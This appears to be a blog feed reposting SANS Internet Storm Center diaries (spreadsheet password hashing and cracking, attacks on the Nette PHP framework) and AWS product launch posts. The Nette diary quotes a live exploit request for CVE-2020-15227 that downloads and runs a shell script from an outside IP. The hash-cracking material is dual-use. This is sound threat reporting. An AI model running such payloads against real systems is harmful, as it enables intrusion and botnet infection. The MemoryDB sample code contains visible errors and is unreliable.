Protected OOXML Spreadsheets, (Mon, Jul 15th)

July 15, 2024 David Leave a comment

This post was originally published on this site

I was asked a question about the protection of an .xlsm spreadsheet. I've written before on the protection of .xls spreadsheets, for example in diary entries "Unprotecting Malicious Documents For Inspection" and "16-bit Hash Collisions in .xls Spreadsheets"; and blog post "Quickpost: oledump.py plugin_biff.py: Remove Sheet Protection From Spreadsheets".

.xlsm spreadsheats (and .xlsx) are OOXML files, and are thus ZIP files containing mostly XML files:

The spreadsheet I'm taking as an example here, has a protected sheet. Let's take a look at the XML file for this sheet by piping zipdump.py's output into xmldump.py:

XML element sheetProtection protects this sheet. If you remove this element, the sheet becomes unprotected.

The password used to protect this sheet, is hashed and the hashvalue is stored as an attribute of element sheetProtection.

Let's print out each attribute on a different line:

The password is hashed hundred thousand times (attribute spinCount) with SHA-512 (attribute algorithmName) together with a salt (attribute saltValue, base64 encoded). This result is stored in attribute hashValue (base64 encoded).

Here is the algorithm in Python:

def CalculateHash(password, salt):
    passwordBytes = password.encode('utf16')[2:]
    buffer = salt + passwordBytes
    hash = hashlib.sha512(buffer).digest()
    for iter in range(100000):
        buffer = hash + struct.pack('<I', iter)
        hash = hashlib.sha512(buffer).digest()
    return hash

def Verify(password, salt, hash):
    hashBytes = binascii.a2b_base64(hash)
    return hashBytes == CalculateHash(password, binascii.a2b_base64(salt))

Spreadsheet protected-all.xlsx is a spreadsheet I created with 3 types of protections: modification protection, workbook protection and sheet protection:

I released a new version of xmldump.py to extract these hashes and format them for hashcat:

For each extracted hash, the lines are:

the name of the containing file
the name of the protecting element (which can be removed should you want to disable that particular protection)
the hashcat compatibel hash (hash mode 25300)
a hashcat command to crack this hash with a wordlist

You can imagine that cracking these hashes with hashcat is rather slow, because 100,000 SHA-256 hash operations need to be executed for each candidate password. On a desktop with a NVIDIA GeForce RTX 3080 GPU, I got around 24,000 hashes per second.

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Security

16-bit Hash Collisions in .xls Spreadsheets, (Sat, Jul 13th)

July 13, 2024 David Leave a comment

This post was originally published on this site

A couple years ago, in diary entry "Unprotecting Malicious Documents For Inspection" I explain how .xls spreadsheets are password protected (but not encrypted). And in follow-up diary entry "Maldocs: Protection Passwords", I talk about an update to my oledump plugin plugin_biff.py to crack these passwords using password lists (by default, an embedded password list is used that is taken from the 2011 public-domain default password list used by John The Ripper).

Security

Attacks against the "Nette" PHP framework CVE-2020-15227, (Fri, Jul 12th)

July 12, 2024 David Leave a comment

This post was originally published on this site

Today, I noticed some exploit attempts against an older vulnerability in the "Nette Framework", CVE-2020-15227 [1].

Nette is a PHP framework that simplifies the development of web applications in PHP. In 2020, an OS command injection vulnerability was found and patched in Nette. As so often with OS command injection, exploitation was rather straightforward. An exploit was released soon after.

Today, I noticed yet another variation of an exploit vor CVE-2020-15227:

/nette.micro/?callback=shell_exec&cmd=cd%20/tmp;wget%20http://199.204.98.254/ohshit.sh;chmod%20777%20ohshit.sh;./ohshit.sh

Even though the exploit is old, and the line above loads a simple DDoS agent, the agent itself has not been uploaded to Virustotal yet [2].

The malware was written in Go, and Virustotal's "Behaviour" analysis does a pretty good job in summarizing the binary.

The binary uses crontab and systemd for persistence.
it uses sosbot.icu on port 1314 for command and control

[1] https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94
[2] https://www.virustotal.com/gui/file/8325bfc699f899d0190e36ea339540ea0590aea0e1b22b8a2dcec3ff8b5763b8

—
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Security

Understanding SSH Honeypot Logs: Attackers Fingerprinting Honeypots, (Thu, Jul 11th)

July 11, 2024 David Leave a comment

This post was originally published on this site

Some of the commands observed can be confusing for a novice looking at ssh honeypot logs. Sure, you have some obvious commands like "uname -a" to fingerprint the kernel. However, other commands are less intuitive and are not commands a normal user would use. I am trying to summarize some of the more common ones here, focusing on commands attackers use to figure out if they are inside a honeypot.

AWS

Vector search for Amazon MemoryDB is now generally available

July 10, 2024 David Leave a comment

This post was originally published on this site

Today, we are announcing the general availability of vector search for Amazon MemoryDB, a new capability that you can use to store, index, retrieve, and search vectors to develop real-time machine learning (ML) and generative artificial intelligence (generative AI) applications with in-memory performance and multi-AZ durability.

With this launch, Amazon MemoryDB delivers the fastest vector search performance at the highest recall rates among popular vector databases on Amazon Web Services (AWS). You no longer have to make trade-offs around throughput, recall, and latency, which are traditionally in tension with one another.

You can now use one MemoryDB database to store your application data and millions of vectors with single-digit millisecond query and update response times at the highest levels of recall. This simplifies your generative AI application architecture while delivering peak performance and reducing licensing cost, operational burden, and time to deliver insights on your data.

With vector search for Amazon MemoryDB, you can use the existing MemoryDB API to implement generative AI use cases such as Retrieval Augmented Generation (RAG), anomaly (fraud) detection, document retrieval, and real-time recommendation engines. You can also generate vector embeddings using artificial intelligence and machine learning (AI/ML) services like Amazon Bedrock and Amazon SageMaker and store them within MemoryDB.

Which use cases would benefit most from vector search for MemoryDB?
You can use vector search for MemoryDB for the following specific use cases:

1. Real-time semantic search for retrieval-augmented generation (RAG)
You can use vector search to retrieve relevant passages from a large corpus of data to augment a large language model (LLM). This is done by taking your document corpus, chunking them into discrete buckets of texts, and generating vector embeddings for each chunk with embedding models such as the Amazon Titan Multimodal Embeddings G1 model, then loading these vector embeddings into Amazon MemoryDB.

With RAG and MemoryDB, you can build real-time generative AI applications to find similar products or content by representing items as vectors, or you can search documents by representing text documents as dense vectors that capture semantic meaning.

2. Low latency durable semantic caching
Semantic caching is a process to reduce computational costs by storing previous results from the foundation model (FM) in-memory. You can store prior inferenced answers alongside the vector representation of the question in MemoryDB and reuse them instead of inferencing another answer from the LLM.

If a user’s query is semantically similar based on a defined similarity score to a prior question, MemoryDB will return the answer to the prior question. This use case will allow your generative AI application to respond faster with lower costs from making a new request to the FM and provide a faster user experience for your customers.

3. Real-time anomaly (fraud) detection
You can use vector search for anomaly (fraud) detection to supplement your rule-based and batch ML processes by storing transactional data represented by vectors, alongside metadata representing whether those transactions were identified as fraudulent or valid.

The machine learning processes can detect users’ fraudulent transactions when the net new transactions have a high similarity to vectors representing fraudulent transactions. With vector search for MemoryDB, you can detect fraud by modeling fraudulent transactions based on your batch ML models, then loading normal and fraudulent transactions into MemoryDB to generate their vector representations through statistical decomposition techniques such as principal component analysis (PCA).

As inbound transactions flow through your front-end application, you can run a vector search against MemoryDB by generating the transaction’s vector representation through PCA, and if the transaction is highly similar to a past detected fraudulent transaction, you can reject the transaction within single-digit milliseconds to minimize the risk of fraud.

Getting started with vector search for Amazon MemoryDB
Look at how to implement a simple semantic search application using vector search for MemoryDB.

Step 1. Create a cluster to support vector search
You can create a MemoryDB cluster to enable vector search within the MemoryDB console. Choose Enable vector search in the Cluster settings when you create or update a cluster. Vector search is available for MemoryDB version 7.1 and a single shard configuration.

Step 2. Create vector embeddings using the Amazon Titan Embeddings model
You can use Amazon Titan Text Embeddings or other embedding models to create vector embeddings, which is available in Amazon Bedrock. You can load your PDF file, split the text into chunks, and get vector data using a single API with LangChain libraries integrated with AWS services.

import redis
import numpy as np
from langchain.document_loaders import PyPDFLoader
from langchain.text_splitter import RecursiveCharacterTextSplitter
from langchain.embeddings import BedrockEmbeddings

# Load a PDF file and split document
loader = PyPDFLoader(file_path=pdf_path)
        pages = loader.load_and_split()
        text_splitter = RecursiveCharacterTextSplitter(
            separators=["nn", "n", ".", " "],
            chunk_size=1000,
            chunk_overlap=200,
        )
        chunks = loader.load_and_split(text_splitter)

# Create MemoryDB vector store the chunks and embedding details
client = RedisCluster(
        host=' mycluster.memorydb.us-east-1.amazonaws.com',
        port=6379,
        ssl=True,
        ssl_cert_reqs="none",
        decode_responses=True,
    )

embedding =  BedrockEmbeddings (
           region_name="us-east-1",
 endpoint_url=" https://bedrock-runtime.us-east-1.amazonaws.com",
    )

#Save embedding and metadata using hset into your MemoryDB cluster
for id, dd in enumerate(chucks*):
     y = embeddings.embed_documents([dd])
     j = np.array(y, dtype=np.float32).tobytes()
     client.hset(f'oakDoc:{id}', mapping={'embed': j, 'text': chunks[id] } )

Once you generate the vector embeddings using the Amazon Titan Text Embeddings model, you can connect to your MemoryDB cluster and save these embeddings using the MemoryDB HSET command.

Step 3. Create a vector index
To query your vector data, create a vector index using theFT.CREATE command. Vector indexes are also constructed and maintained over a subset of the MemoryDB keyspace. Vectors can be saved in JSON or HASH data types, and any modifications to the vector data are automatically updated in a keyspace of the vector index.

from redis.commands.search.field import TextField, VectorField

index = client.ft(idx:testIndex).create_index([
        VectorField(
            "embed",
            "FLAT",
            {
                "TYPE": "FLOAT32",
                "DIM": 1536,
                "DISTANCE_METRIC": "COSINE",
            }
        ),
        TextField("text")
        ]
    )

In MemoryDB, you can use four types of fields: numbers fields, tag fields, text fields, and vector fields. Vector fields support K-nearest neighbor searching (KNN) of fixed-sized vectors using the flat search (FLAT) and hierarchical navigable small worlds (HNSW) algorithm. The feature supports various distance metrics, such as euclidean, cosine, and inner product. We will use the euclidean distance, a measure of the angle distance between two points in vector space. The smaller the euclidean distance, the closer the vectors are to each other.

Step 4. Search the vector space
You can use FT.SEARCH and FT.AGGREGATE commands to query your vector data. Each operator uses one field in the index to identify a subset of the keys in the index. You can query and find filtered results by the distance between a vector field in MemoryDB and a query vector based on some predefined threshold (RADIUS).

from redis.commands.search.query import Query

# Query vector data
query = (
    Query("@vector:[VECTOR_RANGE $radius $vec]=>{$YIELD_DISTANCE_AS: score}")
     .paging(0, 3)
     .sort_by("vector score")
     .return_fields("id", "score")     
     .dialect(2)
)

# Find all vectors within 0.8 of the query vector
query_params = {
    "radius": 0.8,
    "vec": np.random.rand(VECTOR_DIMENSIONS).astype(np.float32).tobytes()
}

results = client.ft(index).search(query, query_params).docs

For example, when using cosine similarity, the RADIUS value ranges from 0 to 1, where a value closer to 1 means finding vectors more similar to the search center.

Here is an example result to find all vectors within 0.8 of the query vector.

[Document {'id': 'doc:a', 'payload': None, 'score': '0.243115246296'},
 Document {'id': 'doc:c', 'payload': None, 'score': '0.24981123209'},
 Document {'id': 'doc:b', 'payload': None, 'score': '0.251443207264'}]

To learn more, you can look at a sample generative AI application using RAG with MemoryDB as a vector store.

What’s new at GA
At re:Invent 2023, we released vector search for MemoryDB in preview. Based on customers’ feedback, here are the new features and improvements now available:

VECTOR_RANGE to allow MemoryDB to operate as a low latency durable semantic cache, enabling cost optimization and performance improvements for your generative AI applications.
SCORE to better filter on similarity when conducting vector search.
Shared memory to not duplicate vectors in memory. Vectors are stored within the MemoryDB keyspace and pointers to the vectors are stored in the vector index.
Performance improvements at high filtering rates to power the most performance-intensive generative AI applications.

Now available
Vector search is available in all Regions that MemoryDB is currently available. Learn more about vector search for Amazon MemoryDB in the AWS documentation.

Give it a try in the MemoryDB console and send feedback to the AWS re:Post for Amazon MemoryDB or through your usual AWS Support contacts.

— Channy

AWS

Build enterprise-grade applications with natural language using AWS App Studio (preview)

July 10, 2024 David Leave a comment

This post was originally published on this site

Organizations often struggle to solve their business problems in areas like claims processing, inventory tracking, and project approvals. Custom business applications could provide a solution to solve these problems and help an organization work more effectively but have historically required a professional development team to build and maintain. But often, development capacity is unavailable or too expensive, leaving businesses using inefficient tools and processes.

Today, we’re announcing a public preview of AWS App Studio. App Studio is a generative artificial intelligence (AI)-powered service that uses natural language to create enterprise-grade applications in minutes, without requiring software development skills.

Here’s a quick look at what App Studio can do. Once I’m signed in to App Studio, I select CREATE A NEW APP using the generative AI assistant. I describe that I need a project approval app. App Studio then generates an app for me, complete with a user interface, data models, and business logic. The entire app generation process is complete in minutes.

Note: This animation above shows the flow at an accelerated speed for demonstration purposes.

While writing this post, I discovered that App Studio is useful for various technical professionals. IT project managers, data engineers, and enterprise architects can use it to create and manage secure business applications in minutes instead of days. App Studio helps organizations build end-to-end custom applications, and it has two main user roles:

Admin – Members in this group can manage groups and roles, create and edit connectors, and maintain visibility into other apps built within their organization. In addition to these permissions, admins can also build apps of their own. To enable and set up App Studio or to learn more about what you can do as an administrator, you can jump to the Getting started with AWS App Studio (preview) section.
Builder – Members of the builder group can create, build, and share applications. If you’re more interested in the journey of building applications, you can skip to the Using App Studio as a builder: Creating an application section.

Getting started with AWS App Studio
AWS App Studio integrates with AWS IAM Identity Center, making it easier for me to secure access with the flexibility to integrate with existing single sign-on (SSO) and integration with Lightweight Directory Access Protocol (LDAP). Also, App Studio manages the application deployments and operations, removing the time and effort required to operate applications. Now, I can spend more of my time adding features to an application and customizing it to user needs.

Before I can use App Studio to create my applications, I need to enable the service. Here is how an administrator would set up an App Studio instance.

First, I need to go to the App Studio management console and choose Get started.

As mentioned, App Studio integrates with IAM Identity Center and will automatically detect if you have an existing organization instance in IAM Identity Center. To learn more about the difference between an organization and an account instance on IDC, you can visit the Manage organization and account instances of IAM Identity Center page.

In this case, I don’t have any organization instance, so App Studio will guide me through creating an account instance in IAM Identity Center. Here, as an administrator, I select Create an account instance for me.

In the next section, Create users and groups and add them to App Studio, I need to define both an admin and builder group. In this section, I add myself as the admin, and I’ll add users into the builder group later.

The last part of the onboarding process is to review and check the tick box in the Acknowledgment section, then select Set up.

When the onboarding process is complete, I can see from the Account page that my App Studio is Active and ready to use. At this point, I have a unique App Studio instance URL that I can access.

This onboarding scenario illustrates how you can start without an instance preconfigured in IAM Identity Center . Learn more on the Creating and setting up an App Studio instance for the first time page to understand how to use your existing IAM Identity Center instance.

Because App Studio created the AWS IAM Identity Center account instance for me, I received an email along with instructions to sign in to App Studio. Once I select the link, I’ll need to create a password for my account and define the multi-factor authentication (MFA) to improve the security posture of my account.

Then, I can sign in to App Studio.

Add additional users (optional)
App Studio uses AWS IAM Identity Center to manage users and groups. This means that if I need to invite additional users into my App Studio instance, I need to do that in IAM Identity Center.

For example, here’s the list of my users. I can add more users by selecting Add user. Once I’ve finished adding users, they will receive an email with the instructions to activate their accounts.

If I need to create additional groups, I can do so by selecting Create group on the Groups page. The following screenshot shows groups I’ve defined for my account instance in IAM Identity Center.

Using AWS App Studio as an administrator
Now, I’m switching to the App Studio and signing in as an administrator. Here, I can see two main sections: Admin hub and Builder hub.

As an administrator, I can grant users access to App Studio by associating existing user groups with roles in the Roles section:

To map the group I created in my IAM Identity Center, I select Add group and select the Group identifier and Role. There are three roles I can configure: admin, builder, and app user. To understand the difference between each role, visit the Managing access and roles in App Studio page.

As an administrator, I can incorporate various data sources with App Studio using connectors. App Studio provides built-in connectors to integrate with AWS services such as Amazon Aurora, Amazon DynamoDB, and Amazon Simple Storage Service (Amazon S3). It also has a built-in connector for Salesforce and a generic API and OpenAPI connector to integrate with third-party services.

Furthermore, App Studio automatically created a managed DynamoDB connector for me to get started. I also have the flexibility to create additional connectors by selecting Create connector.

On this page, I can create other connectors to AWS services. If I need other AWS services, I can select Other AWS services. To learn how to define your IAM role for your connectors, visit Connect App Studio to other services with connectors.

Using App Studio as a builder: Creating an application
As a builder, I can use the App Studio generative AI–powered low-code building environment to create secure applications. To start, I can describe the application that I need in natural language, such as “Build an application to review and process invoices.” Then, App Studio will generate the application, complete with the data models, business logic, and a multipage UI.

Here’s where the fun begins. It’s time for me to build apps in App Studio. On the Builder hub page, I select Create app.

I give it a name, and there are two options for me to build the app: Generate an app with AI or Start from scratch. I select Generate an app with AI.

On the next page, I can start building the app by simply describing what I need in the text box. I also can choose sample prompts which are available on the right panel.

Then, App Studio will prepare app requirements for me. I can improve my plan for the application by refining the prompt and reviewing the updated requirements. Once I’m happy with the results, I select Generate app, and App Studio will generate an application for me.

I found this to be a good experience for me when I started building apps with App Studio. The generative AI capability built into App Studio generated an app for me in minutes, compared to the hours or even days it would have taken me to get to the same point using other tools.

After a few minutes, my app is ready. I also see that App Studio prepares a quick tutorial for me to navigate around and understand different areas.

There are three main areas in App Studio: Pages, Automations, and Data. I always like to start building my apps by defining the data models first, so let’s navigate to the Data section.

In the Data section, I can model my application data with the managed data store powered by DynamoDB or using the available data connectors. Because I chose to let AI generate this app, I have all the data entities defined for me. If I opted to do it manually, I would need to create entities representing the different data tables and field types for my application.

Once I’m happy with the data entities, I can build visual pages. In this area, I can create the UI for my users. I can add and arrange components like tables, forms, and buttons to create a tailored experience for my end users.

While I’m building the app, I can see the live preview by selecting Preview. This is useful for testing the layout and functionality of my application.

But the highlight for me in these three areas is the Automations. With the automations, I can define rules, workflows, and any actions that define or extend my application’s business logic. Because I chose to build this application with App Studio’s generative AI assistant, it automatically created and wired up multiple different automations needed for my application.

For example, every time a new project is submitted, it will trigger an action to create a project and send a notification email.

I can also extend my business logic by invoking API callouts, AWS Lambda, or other AWS services. Besides creating the project, I’d also like to archive the project in a flat-file format into an S3 bucket. To do that, I also need to do some processing, and I happen to already have the functionality built in an existing Lambda function.

Here, I select Invoke Lambda, as shown in the previous screenshot. Then, I need to set the Connector, Function name, and the Function event payload to pass into my existing Lambda function.

Finally, after I’m happy with all the UI pages, data entities, and automations, I can publish it by selecting Publish. I have the flexibility to publish my app in a Testing or Production environment. This helps me to test my application before pushing it to production.

Join the preview
AWS App Studio is currently in preview, and you can access it in the US West (Oregon) AWS Region, but your applications can connect to your data in other AWS Regions.

Build secure, scalable, and performant custom business applications to modernize and streamline mission-critical tasks with AWS App Studio. Learn more about all the features and functionalities on the AWS App Studio documentation page, and join the conversation in the #aws-app-studio channel in the AWS Developers Slack workspace.

Happy building,

— Donnie

AWS

Amazon Q Apps, now generally available, enables users to build their own generative AI apps

July 10, 2024 David Leave a comment

This post was originally published on this site

When we launched Amazon Q Business in April 2024, we also previewed Amazon Q Apps. Amazon Q Apps is a capability within Amazon Q Business for users to create generative artificial intelligence (generative AI)–powered apps based on the organization’s data. Users can build apps using natural language and securely publish them to the organization’s app library for everyone to use.

After collecting your feedback and suggestions during the preview, today we’re making Amazon Q Apps generally available. We’re also adding some new capabilities that were not available during the preview, such as API for Amazon Q Apps and the ability to specify data sources at the individual card level.

I’ll expand on the new features in a moment, but let’s first look into how to get started with Amazon Q Apps.

Transform conversations into reusable apps
Amazon Q Apps allows users to generate an app from their conversation with Amazon Q Business. Amazon Q Apps intelligently captures the context of conversation to generate an app tailored to specific needs. Let’s see it in action!

As I started writing this post, I thought of getting help from Amazon Q Business to generate a product overview of Amazon Q Apps. After all, Amazon Q Business is for boosting workforce productivity. So, I uploaded the product messaging documents to an Amazon Simple Storage Service (Amazon S3) bucket and added it as a data source using Amazon S3 connector for Amazon Q Business.

I start my conversation with the prompt:

I’m writing a launch post for Amazon Q Apps.
Here is a short description of the product: Employees can create lightweight, purpose-built Amazon Q Apps within their broader Amazon Q Business application environment.
Generate an overview of the product and list its key features.

After starting the conversation, I realize that creating a product overview given a product description would also be useful for others in the organization. I choose Create Amazon Q App to create a reusable and shareable app.

Amazon Q Business automatically generates a prompt to create an Amazon Q App and displays the prompt to me to verify and edit if need be:

Build an app that takes in a short text description of a product or service, and outputs an overview of that product/service and a list of its key features, utilizing data about the product/service known to Q.

I choose Generate to continue the creation of the app. It creates a Product Overview Generator app with four cards—two input cards to get user inputs and two output cards that display the product overview and its key features.

I can adjust the layout of the app by resizing the cards and moving them around.

Also, the prompts for the individual text output cards are automatically generated so I can view and edit them. I choose the edit icon of the Product Overview card to see the prompt in the side panel.

In the side panel, I can also select the source for the text output card to generate the output using either large language model (LLM) knowledge or approved data sources. For the approved data sources, I can select one or more data sources that are configured for this Amazon Q Business application. I select the Marketing (Amazon S3) data source I had configured for creating this app.

As you would notice, I generated a fully functional app from the conversation itself without having to make any changes to the base prompt or the individual text output card prompts.

I can now publish this app to the organization’s app library by choosing Publish. But before publishing the app, let’s look at another way to create Amazon Q apps.

Create generative AI apps using natural language
Instead of using conversation in Amazon Q Business as a starting point to create an app, I can choose Apps and use my own words to describe the app I want to create. Or I can try out the prompts from one of the preconfigured examples.

I can enter the prompt to fit the purpose and choose Generate to create the app.

Share apps with your team
Once you’re happy with both layouts and prompts, and are ready to share the app, you can publish the app to a centralized app library to give access to all users of this Amazon Q Business application environment.

Amazon Q Apps inherits the robust security and governance controls from Amazon Q Business, ensuring that data sources, user permissions, and guardrails are maintained. So, when other users run the app, they only see responses based on data they have access to in the underlying data sources.

For the Product Overview Generator app I created, I choose Publish. It displays the preview of the app and provides an option to select up to three labels. Labels help classify the apps by departments in the organization or any other categories. After selecting the labels, I choose Publish again on the preview popup.

The app will instantly be available in the Amazon Q Apps library for others to use, copy, and build on top of. I choose Library to browse the Amazon Q Apps Library and find my Product Overview Generator app.

Customize apps in the app library for your specific needs
Amazon Q Apps allows users to quickly scale their individual or team productivity by customizing and tailoring shared apps to their specific needs. Instead of starting from scratch, users can review existing apps, use them as-is, or modify them and publish their own versions to the app library.

Let’s browse the app library and find an app to customize. I choose the label General to find apps in that category.

I see a Document Editing Assistant app that reviews documents to correct grammatical mistakes. I would like to create a new version of the app to include a document summary too. Let’s see how we can do it.

I choose Open, and it opens the app with an option to Customize.

I choose Customize, and it creates a copy of the app for me to modify it.

I update the Title and Description of the app by choosing the edit icon of the app title.

I can see the original App Prompt that was used to generate this app. I can copy the prompt and use it as the starting point to create a similar app by updating it to include a description of the functionality that I would like to add and have Amazon Q Apps Creator take care of it. Or I can continue modifying this copy of the app.

There is an option to edit or delete existing cards. For example, I can edit the prompt of the Edited Document text output card by choosing the edit icon of the card.

To add more features, you can add more cards, such as a user input, text output, file upload, or preconfigured plugin by your administrator. The file upload card, for example, can be used to provide a file as another data source to refine or fine-tune the answers to your questions. The plugin card can be used, for example, to create a Jira ticket for any action item that needs to be performed as a follow-up.

I choose Text output to add a new card that will summarize the document. I enter the title as Document Summary and prompt as follows:

Summarize the key points in @Upload Document in a couple of sentences

Now, I can publish this customized app as a new app and share it with everyone in the organization.

What did we add after the preview?

As I mentioned, we have used your feedback and suggestions during the preview period to add new capabilities. Here are the new features we have added:

Specify data sources at card level – As I have shown while creating the app, you can specify data sources you would like the output to be generated from. We added this feature to improve the accuracy of the responses.

Your Amazon Q business instance can have multiple data sources configured. However, to create an app, you might need only a subset of these data sources, based on the use case. So now you can choose specific data sources for each of the text output cards in your app. Or if your usecase requires, you can configure the text output cards to use LLM knowledge instead of using any data sources.

Amazon Q Apps API – You can now create and manage Amazon Q Apps programmatically with APIs for managing apps, app library and app sessions. This allows you to integrate all the functionalities of Amazon Q Apps into the tools and applications of your choice.

Things to know:

Regions – Amazon Q Apps is generally available today in the Regions where Amazon Q Business is available, which are the US East (N. Virginia) and US West (Oregon) Regions.
Pricing – Amazon Q Apps is available with the Amazon Business Pro subscription ($20 per user per month), which gives users access to all the features of Amazon Q Business.
Learning resources – To learn more, visit Amazon Q Apps in the Amazon Q Business User Guide.

– Prasad

AWS

Customize Amazon Q Developer (in your IDE) with your private code base

July 10, 2024 David Leave a comment

This post was originally published on this site

Today, we’re making the Amazon Q Developer (in your IDE) customization capability generally available for inline code completion, and we’re launching a preview of customization for the chat. You can now customize Amazon Q to generate specific code recommendations from private code repositories in the IDE code editor and in the chat.

Amazon Q Developer is an artificial intelligence (AI) coding companion. It helps software developers accelerate application development by offering code recommendations in their integrated development environments (IDE) derived from existing comments and code. Behind the scenes, Amazon Q uses large language models (LLMs) trained on billions of lines of code from Amazon and open source projects.

Amazon Q is available in your IDE, and you can download the extension for JetBrains, Visual Studio Code, and Visual Studio (preview). In the IDE text editor, it suggests code as you type or write entire functions from a comment you enter. You can also chat with Q Developer and ask it to generate code for specific tasks or explain code snippets from a code base you’re discovering.

With the new customization capability, developers can now receive even more relevant code recommendations that are based on their organization’s internal libraries, APIs, packages, classes, and methods.

For example, let’s imagine that a developer working for a financial company is tasked to write a function to compute the total portfolio value for a customer. The developer can now describe the intent in a comment or type a function name such as computePortfolioValue(customerId: String), and Amazon Q will suggest code to implement that function based on the examples it learned from your organization’s private code base.

The developer can also ask questions about their organization’s code in the chat. In the example above, let’s imagine the developer is new to the team and doesn’t know how to retrieve a customer ID. He can ask the question in the chat in plain English: how do I connect to the database to retrieve the customerId for a specific customer? Amazon Q chat could answer: I found a function to retrieve customerId based on customer first and last name which uses the database connection XYZ…

As an administrator, you create customizations built from your internal git repositories (such as GitHub, GitLab, or BitBucket) or an Amazon Simple Storage Service (Amazon S3) bucket. It helps Amazon Q understand the intent, determine which internal and public APIs are best suited to the task, and generate code recommendations.

Amazon Q customization capability meets the strong data privacy and security you expect from AWS. The code base you share with Amazon Q stays private to your organization. We don’t use it to train our foundation model. Once customizations are deployed, the inference endpoint is private for the developers in your organization. Recommendations based on your code won’t pop up in another company’s developer IDE. You decide which developers have access to each individual customization, and you can follow metrics to measure the performance of the customizations you deployed.

We built the Amazon Q customization capability based on leading technical techniques, such as Retrieval Augmented Generation (RAG). This very detailed blog post shares more details about the science behind the Amazon Q customizations capability.

Since we launched the preview on October 17 last year, we’ve added two new capabilities: the ability to update a customization and the ability to customize the chat in the IDE.

Your organization’s code base is constantly evolving, and you want Amazon Q to always suggest up-to-date code snippets. Amazon Q administrator can now start an update process with one step in the AWS Management Console. Administrators can schedule regular updates based on the latest commits on code repositories to ensure developers always receive highly accurate code suggestions.

With the new chat customization (in preview), developers in your organization can select a portion of code in their IDE and send it to the chat to ask for an explanation of what the selected code does. Developers can also ask generic questions relative to their organization’s code base, like “How do I connect to the database to retrieve customerId for a specific customer?”

Let’s see how to use it
In this demo, I decided to focus on the new customization update capability that is generally available today. To quickly learn how to create a customization, activate it, and grant access to developers, read the excellent post from my colleague Donnie.

To update an existing customization, I navigate to the Customizations section of the Amazon Q console page. I select the customization I want to update. Then, I select Actions and Create new version.

Similarly to what I did when I created the customization, I choose the source code repository and select Create.

Creating a new version of the customization might take a while because depends on the quantity of code to ingest. When ready, a new version appears under the Versions tab. You can compare the Evaluation score of the new version with the previous versions and decide to activate it to make it available to your developers. At any point, you can revert to a previous version.

One of the aspects I like about active customizations is that I can monitor their effectiveness to help increase developer productivity in my organization.

On the Dashboard page, I track the User activity. I can track how many Daily active users there are, how many Lines of code have been generated, how many Security scans were performed, and so on. If, like me, you have used Amazon CodeWhisperer Professional in the past, when you use it now, you might still see the name CodeWhisperer appear on some pages. It will progressively be replaced with the new name: Amazon Q Developer.

Amazon Q generates more metrics and publishes them on Amazon CloudWatch. I can build CloudWatch dashboards to monitor the performance of the customizations I deployed. For example, here is a custom CloudWatch dashboard that monitors the code suggestions’ Block Accept Rate and Line Accept Rate, broken down per programming language.

Supported programming languages
Currently, you can customize Amazon Q recommendations on codebases written in Java, JavaScript, TypeScript, and Python. Files written in other languages supported by Amazon Q, such as C#, Go, Rust, PHP, Ruby, Kotlin, C, C++, Shell scripting, SQL, and Scala will not be used when creating the customization or when providing customized recommendations in the IDE.

Pricing and availability
Amazon Q is AWS Region agnostic and available to developers worldwide. Amazon Q is currently hosted in US East (N. Virginia). Amazon Q administrators can configure Amazon Q as an authorized cross-Region application if you have AWS IAM Identity Center in other Regions.

The Amazon Q customization capability is available at no additional charge within the Amazon Q Developer Professional subscription. You can create up to eight customizations per AWS account and keep up to two customizations active.

Now go build, and start to propose Amazon Q customizations to your organization’s developers.

— seb

AWS

Agents for Amazon Bedrock now support memory retention and code interpretation (preview)

July 10, 2024 David Leave a comment

This post was originally published on this site

With Agents for Amazon Bedrock, generative artificial intelligence (AI) applications can run multistep tasks across different systems and data sources. A couple of months back, we simplified the creation and configuration of agents. Today, we are introducing in preview two new fully managed capabilities:

Retain memory across multiple interactions – Agents can now retain a summary of their conversations with each user and be able to provide a smooth, adaptive experience, especially for complex, multistep tasks, such as user-facing interactions and enterprise automation solutions like booking flights or processing insurance claims.

Support for code interpretation – Agents can now dynamically generate and run code snippets within a secure, sandboxed environment and be able to address complex use cases such as data analysis, data visualization, text processing, solving equations, and optimization problems. To make it easier to use this feature, we also added the ability to upload documents directly to an agent.

Let’s see how these new capabilities work in more detail.

Memory retention across multiple interactions
With memory retention, you can build agents that learn and adapt to each user’s unique needs and preferences over time. By maintaining a persistent memory, agents can pick up right where the users left off, providing a smooth flow of conversations and workflows, especially for complex, multistep tasks.

Imagine a user booking a flight. Thanks to the ability to retain memory, the agent can learn their travel preferences and use that knowledge to streamline subsequent booking requests, creating a personalized and efficient experience. For example, it can automatically propose the right seat to a user or a meal similar to their previous choices.

Using memory retention to be more context-aware also simplifies business process automation. For example, an agent used by an enterprise to process customer feedback can now be aware of previous and on-going interactions with the same customer without having to handle custom integrations.

Each user’s conversation history and context are securely stored under a unique memory identifier (ID), ensuring complete separation between users. With memory retention, it’s easier to build agents that provide seamless, adaptive, and personalized experiences that continuously improve over time. Let’s see how this works in practice.

Using memory retention in Agents for Amazon Bedrock
In the Amazon Bedrock console, I choose Agents from the Builder Tools section of the navigation pane and start creating an agent.

For the agent, I use agent-book-flight as the name with this as description:

Help book a flight.

Then, in the agent builder, I select the Anthropic’s Claude 3 Sonnet model and enter these instructions:

To book a flight, you should know the origin and destination airports and the day and time the flight takes off.

In Additional settings, I enable User input to allow the agent to ask clarifying questions to capture necessary inputs. This will help when a request to book a flight misses some necessary information such as the origin and destination or the date and time of the flight.

In the new Memory section, I enable memory to generate and store a session summary at the end of each session and use the default 30 days for memory duration.

Then, I add an action group to search and book flights. I use search-and-book-flights as name and this description:

Search for flights between two destinations on a given day and book a specific flight.

Then, I choose to define the action group with function details and then to create a new Lambda function. The Lambda function will implement the business logic for all the functions in this action group.

I add two functions to this action group: one to search for flights and another to book flights.

The first function is search-for-flights and has this description:

Search for flights on a given date between two destinations.

All parameters of this function are required and of type string. Here are the parameters’ names and descriptions:

origin_airport – Origin IATA airport code
destination_airport – Destination IATA airport code
date – Date of the flight in YYYYMMDD format

The second function is book-flight and uses this description:

